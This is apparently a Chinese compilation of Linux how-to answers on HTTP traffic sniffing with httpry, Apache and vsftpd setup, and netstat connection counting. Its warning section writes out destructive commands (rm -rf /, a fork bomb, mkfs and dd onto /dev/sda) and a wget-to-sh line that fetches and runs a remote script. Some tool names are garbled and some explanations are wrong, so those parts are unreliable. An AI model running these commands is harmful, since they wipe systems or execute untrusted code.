linuxhttp命令

① 如何在linux下使用命令行嗅探HTTP流量

假設由於某種原因，你需要嗅探HTTP站點的流量（如HTTP請求與響應）。舉個例子，你可能在測試一個web伺服器的實驗性功能，或者你在為某個web應用或RESTful服務排錯，又或者你正在為PAC(proxy auto config)排錯或尋找某個站點下載的惡意軟體。不論什麼原因，在這些情況下，進行HTTP流量嗅探對於系統管理、開發者、甚至最終用戶來說都是很有幫助的。
數據包嗅工具tcpmp被廣泛用於實時數據包的導出，但是你需要設置過濾規則來捕獲HTTP流量，甚至它的原始輸出通常不能方便的停在HTTP協議層。實時web伺服器日誌解析器如ngxtop可以提供可讀的實時web流量跟蹤痕跡，但這僅適用於可完全訪問live web伺服器日誌的情況。

要是有一個僅用於抓取HTTP流量的類似tcpmp的數據包嗅探工具就非常好了。事實上，httpry就是:HTTP包嗅探工具。httpry捕獲HTTP數據包，並且將HTTP協議層的數據內容以可讀形式列舉出來。通過這篇指文章，讓我們了解如何使用httpry工具嗅探HTTP流量。
在Linux上安裝httpry
基於Debian系統（Ubuntu 或 LinuxMint），基礎倉庫中沒有httpry安裝包(譯者註：本人ubuntu14.04,倉庫中已有包，可直接安裝)。所以我們需要通過源碼安裝:
$ sudo apt-get install gcc make git libpcap0.8-dev$ git clone https://github.com/jbittel/httpry.git$ cd httpry$ make$ sudo make install

在Fedora，CentOS 或 RHEL系統，可以使用如下yum命令安裝httpry。在CentOS/RHEL系統上，運行yum之前使其能夠訪問EPEL repo。
$ sudo yum install httpry

如果你仍想通過基於RPM系統的源碼來安裝httpry的話，你可以通過這幾個步驟實現：
$ sudo yum install gcc make git libpcap-devel$ git clone https://github.com/jbittel/httpry.git$ cd httpry$ make$ sudo make install

httpry的基本用法
以下是httpry的基本用法
$ sudo httpry -i <network-interface>

httpry就會監聽指定的網路介面，並且實時的顯示捕獲到的HTTP請求/相應。

在大多數情況下，由於發送與接到的數據包過多導致刷屏很快，難以分析。這時候你肯定想將捕獲到的數據包保存下來以便離線分析。可以使用'b'或'-o'選項保存數據包。'-b'選項將數據包以二進制文件的形式保存下來，這樣可以使用httpry軟體打開文件以瀏覽。另一方面，'-o'選項將數據以可讀的字元文件形式保存下來。
以二進制形式保存文件：
$ sudo httpry -i eth0 -b output.mp

瀏覽所保存的HTTP數據包文件：
$ httpry -r output.mp

注意，不需要根用戶許可權就可以使用'-r'選項讀取數據文件。
將httpry數據以字元文件保存：
$ sudo httpry -i eth0 -o output.txt

httpry 的高級應用
如果你想監視指定的HTTP方法（如：GET，POST，PUT，HEAD，CONNECT等），使用'-m'選項：
$ sudo httpry -i eth0 -m get,head

如果你下載了httpry的源碼，你會發現源碼下有一些Perl腳本，這些腳本用於分析httpry輸出。腳本位於目錄httpry/scripts/plugins。如果你想寫一個定製的httpry輸出分析器，則這些腳可以作為很好的例子。其中一些有如下的功能：
hostnames: 顯示唯一主機名列表。
find_proxies: 探測web代理。
search_terms: 查找及統計在搜索服務裡面的搜索詞。
content_analysis: 查找含有指定關鍵的URL。
xml_output: 將輸出轉換為XML形式。
log_summary: 生成日誌匯總。
db_mp: 將日誌文件數據保存資料庫。
在使用這些腳本之前，首先使用'-o'選項運行httpry。當獲取到輸出文件後，立即使用如下命令執行腳本：
$ cd httpry/scripts$ perl parse_log.pl -d ./plugins <httpry-output-file>

你可能在使用插件的時候遇到警告。比如，如果你沒有安裝帶有DBI介面的MySQL資料庫，那麼使用db_mp插件時可能會失敗。如果一個插件初始化失敗的話，那麼只是這個插件不能使用，所以你可以忽略那些警告。
當parse_log.pl完成後，你將在httpry/scripts 目錄下看到數個分析結果。例如，log_summary.txt 與如下內容類似。

總的來說，當你要分析HTTP數據包的時候，httpry非常有用。它可能並不被大多Linux使用者所熟知，但會用總是有好處的。你覺得這個工具怎麼樣呢？
https://linux.cn/article-4148-1.html

② linux運維必須知道的幾個常用命令

Linux是一個命令行組成的操作系統，精髓在命令行，無論圖形界面發展到什麼水平這個原理都是無法改變的，Linux命令有許多強大功能：從簡單的磁碟操作、文件存取以及復雜的多媒體圖像和媒體文件都會使用到命令。
Linux常用的命令有哪些？老男孩教育為大家總結一下：
安裝和登錄命令：login 、shutdown 、halt 、reboot 、mount 、umount 、chsh
文件處理命令：file 、mkdir 、grep 、dd 、find 、mv 、ls 、diff 、cat 、ln
網路操作命令：ifconfig 、ip 、ping 、netstat 、telnet 、ftp 、route 、rlogin rcp 、finger
、mail 、nslookup
系統安全相關命令：passwd 、su 、umask 、chgrp 、chmod 、chown 、chattr、sudo、pswho
系統管理相關命令：df 、top 、free 、quota 、at 、lp 、 adser 、groupadd kill 、 crontab 、tar、unzip 、gunzip 、last

③ Linux哪些命令最危險

這9個「非常危險」的Linux命令一定要記住!

1、rm-rf命令

rm-rf命令是刪除文件夾及其內容最快的一種方式，僅僅一丁點的敲錯或者無知都可能導致不可恢復的系統崩壞。

rm命令在Linux下通常用來刪除文件

rm-f命令遞歸的刪除文件夾，甚至是空的文件夾

rm-f命令能不經過詢問直接刪除只讀文件

rm-rf/：強制刪除根目錄下所有東西

rm-rf/*：強制刪除當前目錄的所有文件

rm-rf.：強制刪除當前文件夾及其子文件

溫馨提示：當你要執行rm -rf命令時，一定要留心，可以在「.bashrc」文件對「rm」命令創建rm
-i的別名，來預防用『rm』命令刪除文件時的事故。

2、:(){:|:&};:命令

這就是一個fork炸彈的實例。具體操作是通過定義一個名為'：'的函數，它會調用自己兩次，一次在前台另一次運行在後台。它會反復的執行下去直到系統崩潰。

3、命令 >/dev/sda

上列命令會將某個'命令'的輸出寫到塊設備/dev/sda中。該操作會將在塊設備中的所有數據塊替換為命令寫入的原始數據，從而導致整個塊設備的數據丟失。

4、mv文件夾/dev/null

這個命令會移動某個'文件夾'到/dev/null。在Linux中/dev/null或null設備是一個特殊的文件，所有寫入它的數據都會被清除，然後返回寫操作成功。

5、wget http://malicious_source -O- | sh

上面這個命令會從一個惡意源下載一個腳本並執行。Wget命令會下載這個腳本，而sh會執行下載下來的腳本。

溫馨提示：你應該時刻注意你下載包或者腳本的源。只能使用那些從可信任的源中下載腳本/程序。

6、mkfs.ext3 /dev/sda

上列命令會格式化設備'sda'，你無疑知道在執行上列命令後你的塊設備會被格式化，嶄新的。沒有任何數據，直接讓你的系統達到不可恢復的階段。

7、> file

上面命令常用來清空文件內容，如果用上列執行時輸入錯誤或無知的輸入類似「> xt.conf」的命令會覆蓋配置文件或其他任何的系統配置文件。

8、^foo^bar

這個命令用來編輯先前運行的命令而無需要打整個命令。但當用foobar命令時如果你沒有徹底檢查改變原始命令的風險，這可能導致真正的麻煩。

9、dd if=/dev/random of=/dev/sda

上面這個命令會向塊設備sda寫入隨機的垃圾文件從而擦除數據。當然，你的系統可能陷入混亂和不可恢復的狀態。

④ 如何在linux系統搭建http服務

1、安裝ftp服務端，方便你從客戶端上傳文件。linux上一般安裝vsftp.VSFTP的軟體安裝包是： vsftpd-2.2.2-12.el6_5.1.i686.rpm
查詢：#rpm -q vsftpd
安裝：#rpm -ivh vsftpd-2.2.2-12.el6_5.1.i686.rpm或者直接yum install vsftpd
啟動、停止及重啟VSFTP的命令： #service vsftpd start/stop/restart
配置文件：
/etc/vsftpd/vsftpd.conf //主配置文件
/etc/vsftpd.ftpusers //被禁止登錄FTP的用戶文件
/etc/vsftpd.user_list //允許登錄FTP的用戶文件
a、將登錄後的用戶限制在本地家目錄下：
#vi /etc/vsftpd/vsftpd.conf
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
新建受限用戶的列表文件並加入受限用戶名
#vi /etc/vsftpd.chroot_list
raykeso
重啟ftp服務
#service vsftpd restart
2、安裝apache，開啟目錄索引，這樣你就可以瀏覽和下載文件。
apache配置文件
<Directory "I:/build/dist"> #設置瀏覽文件的目錄
Options Indexes #開啟目錄列表索引模式Order allow,deny
Allow from all
</Directory>

⑤ linux 系統查找整台機http.conf文件放在那,用什麼命令

11,查找文件的locate命令

locate 命令可用來搜索包含指定條件字元串的文件或目錄。範例如下：

[tony@free tony]$ locate zh_CN 列出所有包含「zh_CN」字元串的文件和目錄。

由於locate命令是從系統中保存文件及目錄名稱的資料庫中搜索文件，雖然系統會定時更新資料庫，但對於剛新增或刪除的文件、目錄，仍然可能會因為資料庫尚未更新而無法查得，此時可用root身份運行updatedb命令更新，為此資料庫得內容正確。

12，搜索字元串得grep命令

grep 命令可以搜索特定字元串來並顯示出來，一般用來過濾先前得結果，避免顯示太多不必要得信息。範例如下：

[tony@free etc]$ grep text *.conf ← 搜索當前目錄中擴展名為.conf且包含「text」字元串得文件。

grep:amd.conf: ← 拒絕不符許可權得操作

grep:diskcheck.conf: ← 拒絕不符許可權得操作

grep:grub.conf ← 拒絕不符許可權得操作

 若您是使用一般許可權的用戶運行，上例的輸出結果會包含很多如「拒絕不符許可權的操作之類的錯誤信息，可使用-s參數消除。

[tony@free etc]$ grep –s text *.conf

你根據這些提示試試吧!

⑥ Linux啟動httpd命令

Linux httpd命令是Apache HTTP伺服器程序。httpd為Apache HTTP伺服器程序。直接執行程序可啟動伺服器的服務。

1、apahce啟動命令：推薦/usr/local/apache2/bin/apachectl start apaceh啟動

2、apache停止命令:/usr/local/apache2/bin/apachectlstop 停止

3、apache重新啟動命令：/usr/local/apache2/bin/apachectl restart 重啟要在重啟 Apache 伺服器時不中斷當前的連接，則應運行：/usr/local/sbin/apachectl graceful

如果apache安裝成為linux的服務的話，可以用以下命令操作：service httpd start 啟動service httpd restart 重新啟動service httpd stop 停止服務

4.httpd是Apache超文本傳輸協議(HTTP)伺服器的主程序。被設計為一個獨立運行的後台進程，它會建立一個處理請求的子進程或線程的池。

通常，httpd不應該被直接調用，而應該在類Unix系統中由 apachectl 調用，在Windows NT/2000/XP/2003中作為服務運行和在Windows 95/98/ME中作為控制台程序運行。

(6)linuxhttp命令擴展閱讀

linux與windows對比

1、 編程篇

雖然五年已經過去了，但是系統編程的模式基本沒有什麼改變，由於GPL的存在linux在編程效率上比windows要高不少，這是因為GPL公開程序代碼，這樣可以減少重復開發，所以linux在編程模式上比windows要略微強點。

但是須知windows還是常用軟體的主要載體，所以windows下的軟體還是要移植到windows下的，當然有很多軟體還是一直就在windows下開發的，所以這點windows並不比linux弱的太多。

值得一提的是windows8種引入的windows store，這樣的應用不知道可不可以在linux下開發，貌似目前windows8 app都是在windows8下開發的。

2、運行平台篇

linux系統可以運行在幾乎所有的硬體結構上，無論是intel、amd、arm處理器都可以，甚至我國的龍芯上跑的也是linux。而windows在更新到windows8後也實現了支持intel、amd和arm三大處理器架構。

但是相對而言，windows8 RT只能運行在特定的架構上並且不發售零售版，所以可以暫時不考慮。即linux比windows支持的處理器平台多。

linux下處理器性能能否達到windows的標准還很難說，因為電源管理等諸多問題，linux並不一定能發揮硬體的全部效率。這點在顯卡上體現的特別明顯。

AMD的顯卡開源驅動只能實現顯卡一半的性能，所以在運行平台上，linux兼容的更多，但是windows更完美，相對而言，只考慮運行平台的話（能用）linux略占優勢。

3、 硬體支持篇

linux的硬體支持除了顯卡外我感覺還是和windows保持同步的，比如usb3.0，HDMI等但在顯卡方面，尤其是雙顯卡方面linux就和windows差距明顯了，linux目前還沒有可靠的雙顯卡交火或者雙顯卡交互手段，所以就憑這一點linux在硬體支持方面占極大劣勢，

因為沒有雙顯卡支持會導致雙顯卡一直通電，能耗直線上升! 雖然linux的新內核早已解決了這個問題，但是linux下顯卡驅動的不足也導致這方面問題沒有根本解決。

4、網路篇

個人感覺除了google的chorme os外linux的網路已經發展的登峰造極了，linux對網路的利用率是非常高的，畢竟GPL的基本交流手段就是網路，所以網路功能上linux很給力的，至於ipv6什麼的windows和linux早就一樣哈皮了。

不過有一點就是flash player上的問題制約了linux網路媒體的應用，因為flash player在linux佔用的資源過高，導致性能下降……

5、 設備驅動篇

這個linux基本上什麼設備都能認出來，但是能驅動的設備顯然沒有windows多，畢竟除了arm處理器外基本上每個硬體都會為windows寫驅動，但是能為linux寫驅動的就不多了，很多linux驅動是用開源驅動的，這樣的話效率……

所以個人感覺windows的驅動比linux下強。

6、 UNIX能力篇

這個，我不太同意原作者設立這個指標的，畢竟linux是unix like系統，而windows和這個不沾邊……所以UNIX能力肯定是linux強啊，但是不是還有原版的unix么，所以這點應該列入評價指標。

7、性能篇

這個是很重要的一點，原作者分為開放性、多用戶和多任務三個方面來進行的對比。開放性其實linux和windows都一樣的，都很開放，不過windows8相比前輩們有點保守，所以linux的開放性應該更好點。

多用戶方面，linux和windows都支持多個用戶，但是linux可以多用戶同時登陸，不過考慮到個人電腦的情況，這個指標一般沒有什麼用。所任務，這點有很多測評，大家可以去網路或者google一下，一般大家都認為linux效率更高一點。

8、創新篇

我實際上很反對這種為了創新而創新的對比方式的。windows和linux都是操作系統，為了實現類似的功能，出現多多少少一些類似是正常的。

就開發狀態而言，linux是開源的，而windows不開源，所以linux應該高點，但是不要忘了windows系統也能得到全世界的很多第三方軟體的支持，所以創新性而言雙方並沒有可比性，因該是在同一水平。

9、病毒防護篇

這一點毫無疑問是linux獲勝，目前世界上還沒有一種可以在linux下大規模泛濫的病毒，而且linux的安全性完全是建立在其保守的內核設計上的，所以linux是很安全的。相對於windows雖然windows8在win7的基礎上又提高了很多，但是與linux還是有差距的。

實際上，為了保證用戶體驗，很多時候windows是必須犧牲防護性能的，所以能做到這點已經非常不容易了，真要超級安全的還FreeBSD是不是更安全呢？

10、穩定篇

系統穩定性上我感覺linux與windows不相上下，因為windows與linux都會崩潰，雖然windows崩潰原因很多，而linux崩潰大部分是有誤操作，但是二者的差距真心沒有那麼大，而且windows實際上出現藍屏代碼什麼的故障次數也已經比以前少多了。

⑦ 查看當前linux有多少條http鏈接 的命令語句

1、查看apache當前並發訪問數：


#對比httpd.conf中MaxClients的數字差距多少。
netstat -an | grep ESTABLISHED | wc -l

2、查看httpd進程數（即prefork模式下Apache能夠處理的並發請求數）：
ps aux|grep httpd|wc -l

3、可以使用如下參數查看數據


ps -ef|grep httpd|wc -l
#1388
#統計httpd進程數，連個請求會啟動一個進程，使用於Apache伺服器。
#表示Apache能夠處理1388個並發請求，這個值Apache可根據負載情況自動調整。
netstat -nat|grep -i "80"|wc -l
#4341
#netstat -an會列印系統當前網路鏈接狀態，而grep -i "80"是用來提取與80埠有關的連接的，wc -l進行連接數統計。
#最終返回的數字就是當前所有80埠的請求總數。
netstat -na|grep ESTABLISHED|wc -l
#376
#netstat -an會列印系統當前網路鏈接狀態，而grep ESTABLISHED 提取出已建立連接的信息。 然後wc -l統計。
#最終返回的數字就是當前所有80埠的已建立連接的總數。
netstat -nat||grep ESTABLISHED|wc
#可查看所有建立連接的詳細記錄

4、查看Apache的並發請求數及其TCP連接狀態：

netstat -n | awk '/^tcp/ {++S[$NF]} END {for (a in S) print a, S[a]}'

（這條語句是從 新浪互動社區事業部 新浪互動社區事業部技術總監王老大那兒獲得的，非常不錯）返回結果示例：


LAST_ACK 5
SYN_RECV 30
ESTABLISHED 1597
FIN_WAIT1 51
FIN_WAIT2 504
TIME_WAIT 1057

其中:
SYN_RECV表示正在等待處理的請求數；
ESTABLISHED表示正常數據傳輸狀態；
TIME_WAIT表示處理完畢，等待超時結束的請求數。

5、輸出每個ip的連接數，以及總的各個狀態的連接數
netstat -n | awk '/^tcp/ {n=split($(NF-1),array,":");if(n<=2)++S[array[(1)]];else++S[array[(4)]];++s[$NF];++N} END {for(a in S){printf("%-20s %s\n", a, S[a]);++I}printf("%-20s %s\n","TOTAL_IP",I);for(a in s) printf("%-20s %s\n",a, s[a]);printf("%-20s %s\n","TOTAL_LINK",N);}'

⑧ linux怎麼抓取http請求

①-安裝tcpmp(命令) wireshark（圖形化）
②-tcpmp tcp port 80 -n -X -s 0

###在終端輸出
③-tcpmp tcp port 80 -n -s 0 -w /tmp/tcp.cap
###通過wireshark進行查看
④-tcpmp tcp port 80 -n -s 0 -X -l |grep xxx
###xxx為 你要過濾的關鍵字

⑨ 如何在Linux上從命令行嗅探HTTP流量

假設你出於某個原因而想嗅探網路上的實時HTTP Web流量（比如HTTP請求和回應）。比如說，你可能在測試網站伺服器的試驗性功能，或者在調試Web應用程序或充分利用REST的服務，抑或是你想要為PAC（代理自動配置）排查故障，或檢查從某個網站偷偷下載的任何惡意軟體文件。不管出於什麼原因，嗅探HTTP流量大都有幫助，對系統管理員、開發人員、甚至最終用戶來說都是如此。

雖然tcpmp等數據包嗅探工具廣泛用於實時的數據包轉儲，你還是需要建立合理的過濾機制，以便只捕獲HTTP流量；即使那樣，通常無法很容易地在HTTP協議層面解讀它們的原始輸出。ngxtop等實時網站伺服器日誌分析工具提供了人類可讀的實時網站流量痕跡，但只有在完全訪問實時網站伺服器日誌的情況下才適用。

雖然擁有tcpmp之類的嗅探工具不錯，但只針對HTTP流量。實際上，httpry正是我們所需的一款HTTP數據包嗅探工具。httpry可捕獲網路上的實時HTTP數據包，並且以一種人類可讀的格式，顯示HTTP協議層面的內容。我們在本教程中將看看如何使用httpry來嗅探HTTP流量。

將httpry安裝到Linux上

在基於Debian的系統上（Ubuntu或Linux Mint），httpry並未出現在基本軟體庫中。所以要使用其源代碼來構建它：

在Fedora、CentOS或RHEL上，你可以使用yum來安裝httpry，如下所示。在CentOS/RHEL上，先啟用EPEL軟體庫，再運行yum。

如果你仍想在基於RPM的系統上使用源代碼來構建httpry，很容易做到這一點，只要：

httpry的基本用法

httpry的基本使用場合如下：

httpry隨後偵聽某個特定的網路介面，並實時顯示捕獲的HTTP請求/回應。

不過在大多數情況下，由於大量數據包進進出出，你會看到快速滾動的輸出結果。所以，你應該保存已捕獲的HTTP數據包以便離線分析。為此，使用「-b」或「-o」選項。「-b」選項讓你可以將原始的HTTP數據包保存到二進制文件中，然後可以使用httpry回放HTTP數據包。另一方面，「-o」選項將httpry人類可讀的輸出結果保存到文本文件中。

想把原始的HTTP數據包保存到二進制文件中：

回放已保存的HTTP數據包：

請注意：當你使用「-r」選項讀取轉儲文件時，就不需要根許可權。

想將httpry的輸出結果保存到文本文件中：

httpry的高級用法

如果你只想監視特定的HTTP方法（比如GET、POST、PUT、HEAD和CONNECT等），可以使用「-m」選項：

如果你下載了httpry的源代碼，就會注意到源代碼隨帶一系列有助於分析httpry輸出結果的Perl腳本。這些腳本位於httpry/scripts/plugins目錄中。如果你想編寫自定義的腳本來分析httpry的輸出結果，這些腳本就是可供參考的好例子。其中一些功能如下：

•hostnames：顯示獨特主機名稱和主機數量的列表。

•find_proxies：檢測網站代理系統。

•search_terms：查找並計數搜索服務中輸入的搜索詞語。

•content_analysis：查找含有特定關鍵詞的URL。

•xml_output：將輸出結果轉換成XML格式。

•log_summary：生成日誌摘要。

•db_mp：將日誌文件數據轉儲到MySQL資料庫中。

在使用這些腳本之前，先使用「-o」選項運行httpry一段時間。一旦你獲得了輸出文件，使用下面這個命令，運行一次腳本：

你可能會遇到幾個插件的警告信息。比如說，如果你沒有創建帶DBI介面的MySQL資料庫，db_mp插件就可能會出錯。要是某個插件未能初始化，它會自動被禁用。所以，你可以忽視那些警告信息。

在parse_log.pl完成之後，你會在httpry/scripts目錄下看到許多分析結果（*.txt/xml）。比如說，log_summary.txt看起來就像下面這樣：

總而言之，如果你碰到需要解讀實時HTTP數據包的情況，httpry就幫得上大忙。普通的Linux用戶可能不常解讀實時HTTP數據包，但防患未然總歸不是件壞事。你覺得這款工具如何？謝謝閱讀，希望能幫到大家，請繼續關注，我們會努力分享更多優秀的文章。

英文：http://xmolo.com/2014/08/sniff-http-traffic-command-line-linux.html